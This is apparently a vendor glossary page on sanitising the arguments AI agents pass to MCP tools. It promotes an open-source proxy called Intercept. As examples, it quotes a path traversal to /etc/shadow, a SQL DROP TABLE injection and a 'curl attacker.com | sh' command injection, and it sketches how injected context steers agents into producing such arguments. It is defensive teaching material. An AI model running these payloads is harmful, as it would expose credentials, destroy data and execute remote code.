// GLOSSARY -- AI AGENT SECURITY

What is Input Sanitisation?

2 min read Updated

The process of cleaning and validating arguments that an AI agent passes to MCP tools before execution, preventing injection attacks, path traversal, command injection, and malformed requests.

WHY IT MATTERS

Input sanitisation is a foundational security practice from web application development. Every security engineer knows: never trust user input. For AI agents, the principle extends to: never trust agent-generated arguments. The LLM producing tool call arguments is not a trusted source — it is an interpreter of potentially adversarial input.

When an agent calls an MCP tool, the arguments it passes are generated by the LLM based on its context — which may include injected instructions, poisoned tool descriptions, or manipulated user input. Without sanitisation, these arguments flow directly to the MCP server. A file path argument of ../../etc/shadow exploits path traversal. A SQL argument of '; DROP TABLE users; -- exploits SQL injection. A command argument of curl attacker.com | sh exploits command injection.

These are not novel attack classes — they are the same injection vulnerabilities that have plagued web applications for decades. What is new is the attack surface: instead of a human typing into a form, an LLM generates arguments that may incorporate adversarial content from its context window. The agent does not intend malice, but it faithfully reproduces patterns from poisoned input.

Effective sanitisation for MCP tool arguments includes type validation (is this argument the expected type?), range checking (is this number within bounds?), pattern matching (does this path match the allowed pattern?), and content filtering (does this string contain injection patterns?).

HOW POLICYLAYER USES THIS

Intercept performs argument validation as part of its policy evaluation pipeline. YAML policies define conditions on tool arguments — allowed values, regex patterns, numeric ranges, and string constraints. Before a tool call reaches the MCP server, Intercept evaluates every argument against these conditions. A file path that attempts traversal, a command string that contains injection patterns, or an argument that exceeds its expected range is caught and denied at the proxy layer. This is infrastructure-level sanitisation that operates independently of the agent and the server.

FREQUENTLY ASKED QUESTIONS

Why can't the MCP server handle its own input validation?
It can and should — but you cannot rely on it. MCP servers vary in quality, many are community-maintained, and their validation may be incomplete. Intercept provides a consistent validation layer regardless of how well individual servers handle input. Defence in depth means validating at multiple points.
What types of injection are most common in MCP tool calls?
Path traversal in file system tools, command injection in shell/exec tools, SQL injection in database tools, and URL manipulation in HTTP/API tools. These mirror the OWASP Top 10 for web applications — the attack classes are identical, only the delivery mechanism (agent-generated arguments) is new.
How do I write sanitisation rules in Intercept policies?
Use argument conditions in YAML: regex patterns to match allowed formats, string constraints to block dangerous substrings, numeric ranges to enforce bounds, and enum lists to restrict to known-good values. Intercept evaluates these conditions before forwarding the tool call.

FURTHER READING

Enforce policies on every tool call

Intercept is the open-source MCP proxy that enforces YAML policies on AI agent tool calls. No code changes needed.

npx -y @policylayer/intercept
github.com/policylayer/intercept →
// GET IN TOUCH

Have a question or want to learn more? Send us a message.

Message sent.

We'll get back to you soon.